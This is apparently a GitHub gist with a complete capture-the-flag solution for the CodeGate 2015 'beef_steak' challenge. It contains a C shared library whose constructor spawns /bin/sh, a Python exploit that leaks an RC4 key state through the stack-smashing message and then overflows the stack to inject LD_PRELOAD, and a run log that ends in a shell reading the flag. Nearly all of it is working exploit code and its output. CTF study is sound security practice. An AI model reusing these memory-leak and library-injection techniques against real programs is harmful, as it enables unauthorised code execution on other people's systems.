Skip to content

Instantly share code, notes, and snippets.

@inaz2

inaz2/mylib.c

Last active January 25, 2016 05:13
Show Gist options
  • Save inaz2/bf4d2b10db21151843b2 to your computer and use it in GitHub Desktop.
Save inaz2/bf4d2b10db21151843b2 to your computer and use it in GitHub Desktop.
Download ZIP
CodeGate 2015 beef_steak (Pwnable 400) / 2016/01/23 katagaitai CTF勉強会 - 関東|med
Raw
mylib.c
#include <stdlib.h>
__attribute__((constructor)) void init() {
char *args[] = {"/bin/sh", NULL};
execve(args[0], args, NULL);
}
Raw
result.txt
$ ls
mylib.c roputils.py@ steak* steak.py
$ sudo mkdir /home/steak
$ sudo chown user:user /home/steak
$ echo THIS_IS_A_FLAG >/home/steak/flag
$ gcc -shared -fPIC -o mylib.so mylib.c
$ python steak.py
[+] leak RC4 state ...
What's your favorite food?
........................................................................................................................................................................................................................................................................................`!`.....
Hmm........*** stack smashing detected ***: ..R...
p...#. terminated ?..u).`.ZzI..x!.c..yh.....sX.f.Q.Eg...N4<62........GLr. .-.m"..$.wle..5.,1.&....iaB...A...Fo..{.....U% +'..v.;..b..
What's your favorite food?
.........................................................................................................................................................................................................................................................................................!`.....
Hmm........*** stack smashing detected ***: ...:3..P...0...}....[d...._.....~......^.Y...n....V....W*8....|[email protected].........(...k.O...
q..JT].M...7..C.>t.j....9S...=\./H.. terminated
[+] RC4 state: [224, 157, 82, 176, 195, 239, 11, 63, 20, 1, 117, 41, 177, 96, 142, 90, 122, 73, 244, 25, 120, 33, 223, 99, 180, 171, 121, 104, 8, 139, 209, 28, 154, 115, 88, 173, 102, 187, 81, 153, 69, 103, 19, 151, 134, 78, 52, 60, 54, 50, 6, 127, 190, 172, 238, 27, 214, 186, 71, 76, 114, 203, 9, 141, 45, 133, 109, 34, 148, 213, 36, 170, 119, 108, 101, 161, 152, 53, 193, 12, 44, 49, 232, 38, 179, 248, 235, 250, 105, 97, 66, 178, 15, 168, 65, 234, 165, 220, 70, 111, 128, 228, 123, 24, 204, 131, 175, 162, 85, 37, 32, 43, 39, 206, 219, 118, 7, 59, 26, 129, 98, 140, 207, 13, 112, 231, 144, 150, 35, 160, 0, 253, 200, 156, 58, 51, 21, 169, 80, 254, 242, 210, 48, 158, 184, 212, 125, 135, 197, 221, 217, 91, 100, 215, 4, 23, 137, 95, 183, 230, 201, 236, 16, 126, 241, 149, 211, 247, 174, 132, 94, 29, 89, 5, 155, 147, 110, 226, 166, 194, 192, 86, 188, 198, 185, 233, 87, 42, 56, 14, 227, 243, 164, 124, 159, 75, 205, 64, 2, 68, 208, 17, 136, 30, 130, 225, 251, 222, 216, 40, 252, 31, 202, 107, 249, 79, 46, 146, 22, 10, 113, 167, 255, 74, 84, 93, 218, 77, 229, 245, 237, 55, 163, 143, 67, 246, 62, 116, 181, 106, 138, 18, 199, 191, 57, 83, 189, 182, 145, 61, 92, 196, 47, 72, 3, 240]
[+] decrypt cipher ...
[+] decrypted: "M\ts\x84'\xc6t\x04\xa14O\x99\xc9I\xedY\xc4sU\xa5\xb7G\x8d\x92"
[+] write mylib.so as message
What's your favorite food?
M s.'.t..4O..I.Y.sU..G..
Hmm........That's my favorite!
You may leave a message
(snip)
[+] exec with LD_PRELOAD
What's your favorite food?
M s.'.t..4O..I.Y.sU..G.....9;.:...1..z....t.OM..FllNFVW2d3qtG2ghzlQi3bO4S9ucqia2jJRg0R6SzKeUJ1mIPSRuqi0VyDdgmHco5mUAEgI2liGyAj1ULhQJvkjJE9Yqd1pRKr7DQToCOTljRbr9WCkylpbjmksGAW7lhWrd0Nh8JNgZoMeoSVqCZQXaBia48cFDUCBoD2JAucKMBmDSHmEKRgsprmEsXvA8lXCg5XrxmTH7ae5mgRwiOC1iCdUTZsKlzXIvaGACXgHc4m2jjCaBAFUE:!`.............
Hmm........That's my favorite!
You may leave a message
echo ".[32mgot a shell!.[0m"
.[32mgot a shell!.[0m
got a shell!
exec /bin/sh <&0 >&0 2>&0
id
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare)
pwd
/home/steak
ls
flag
message
cat flag
THIS_IS_A_FLAG
Raw
steak.py
from roputils import *
rop = ROP('./steak')
addr_state = rop.addr('state')
addr_output = rop.addr('output')
def get_state(offset=0):
p = Proc(rop.fpath, display=True)
p.read()
buf = '\0' * 280
buf += rop.p(addr_state + offset)
p.writeline(buf)
m = p.expect(r': ([\s\S]+) terminated\n')
data = m.group(1)
p.close()
return data
def rc4_PRGA(size, S):
pos = 0; pos2 = 0; output = ""
for i in xrange(size):
pos2 = (pos2 + 1) % 256
pos = (pos + S[pos2]) % 256
S[pos], S[pos2] = S[pos2], S[pos]
o = S[(S[pos] + S[pos2]) % 256]
output += chr(o)
return output
def rc4(s1, S):
s2 = rc4_PRGA(len(s1), S[::])
xored = [chr(ord(a)^ord(b)) for a,b in zip(s1, s2)]
return ''.join(xored)
print "[+] leak RC4 state ..."
S = ''
while True:
S += get_state(len(S))
if len(S) >= 256:
break
S += '\0'
S = map(ord, S[:256])
print "[+] RC4 state: %r" % S
print "[+] decrypt cipher ..."
cipher = "6231aa85bdbf9ff38a020c75ac23abe482c5257aefbdc961".decode('hex')
plain = rc4(cipher, S)
print "[+] decrypted: %r" % plain
print "[+] write mylib.so as message"
p = Proc(rop.fpath, display=True)
p.read()
p.writeline(plain)
p.read_until('message\n')
p.write(open('mylib.so', 'rb').read())
p.close()
print "[+] exec with LD_PRELOAD"
buf = cipher + '\0\0'
offset = len(buf)
buf += 'LD_PRELOAD=./message\0'
buf = rc4(buf, S) + '\0'
buf += rop.fill(296, buf)
buf += rop.p(addr_output + offset) + rop.p(0)
p = Proc(rop.fpath, display=True)
p.read()
p.writeline(buf)
p.read_until('message\n')
p.interact(0)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment